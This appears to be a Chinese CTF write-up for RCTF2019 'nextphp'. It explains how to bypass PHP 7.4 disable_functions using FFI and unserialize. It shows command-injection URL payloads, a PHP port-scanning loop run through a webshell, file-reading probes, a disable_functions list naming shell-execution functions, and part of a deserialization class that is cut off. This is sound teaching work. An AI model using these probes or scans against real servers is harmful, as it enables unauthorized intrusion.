这题主要考察PHP-7.4中的两个特性( FFI 、 Serializable 的 __serialize 和 __unserialize ),通过 FFI 绕过 disable_functions 限制。
首先拿到题目:
存在命令执行,测试无果,全部报错,这里网上有两个绕过方法:
可以在中间加上空格phpinfo ()绕过
?a=phpinfo+();
?a=echo phpinfo();
以通过 phpinfo 发现存在如下关键信息:
PHP Version 7.4.0-dev
内网IP:172.20.0.1
开启了FFI
opcache.preload:/var/www/html/preload.php
open_basedir:/var/www/html
disable_classes:ReflectionClass
disable_functions:set_time_limit,ini_set,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,system,exec,shell_exec,popen,proc_open,passthru,symlink,link,syslog,imap_open,ld,mail,putenv,error_log,dl
刚开始,想通过这个shell进行SSRF扫描内网,看看内网是否还有其他主机运行web,因为有可能内网中其他机器上的disable_functions限制没有这么严格。
// 端口扫描:
$hosts='127.0.0.1';
$timeout=0.5;
for($i=0;$i<65535;$i++){
$c=@fsockopen($hosts,$i, $en,$es, $timeout);
if(is_resource($c)){
echo $hosts.':'.$i.' => open\n
';
fclose($c);
}
ob_flush();
flush();
}
# 题目内网IP:172.20.0.1
172.20.0.2:80 => open\n
172.20.0.2:46036 => open\n
172.20.0.2:53310 => open\n
172.20.0.2:65616 => open\n
发现 172.20.0.2 上有和题目一模一样的 web 环境,但是对比了他们两个的 phpinfo 信息,发现是一样的,其他端口没什么发现,放弃这个思路。
发现没有过滤scandir()
http://web18.buuoj.cn/?a=var_dump(scandir('/var/www/html'));
http://web18.buuoj.cn/?a=var_dump(scandir(getcwd()));
爆出根目录文件
利用file_get_contents()/show_source查看preload.php源码
http://web18.buuoj.cn/?a=echo file_get_contents('preload.php');
http://web18.buuoj.cn/?a=show_source("preload.php");
null,
'func' => 'print_r',
'arg' => '1'
];
private function run () {
$this->data['ret'] = $this->data['func']($this->data['arg']);
}
public function __serialize(): array {
return $this->data;
}
public function __unserialize(array $data) {
array_merge($this->data, $data);
$this->run();
}
public function serialize (): string {
return serialize($this->data);
}
public function unserialize($payload) {
$this->data = unserialize($payload);
$this->run();
}
public function __get ($key) {
return $this->data[$key];
}
public function __set ($key, $value) {
throw new \Exception('No implemented');
}
public function __construct () {
throw new \Exception('No implemented');
}
}
参考文章:
http://118.25.174.93/index.php/archives/694/#nextphp
https://blog.csdn.net/qq_41809896/article/details/90384668
https://aluvion.github.io/2019/05/25/RCTF2019-Web-nextphp%E5%BC%95%E5%8F%91%E7%9A%84%E6%80%9D%E8%80%83%E5%92%8C%E5%AD%A6%E4%B9%A0/
https://mochazz.github.io/2019/05/21/RCTF2019Web%E9%A2%98%E8%A7%A3%E4%B9%8Bnextphp/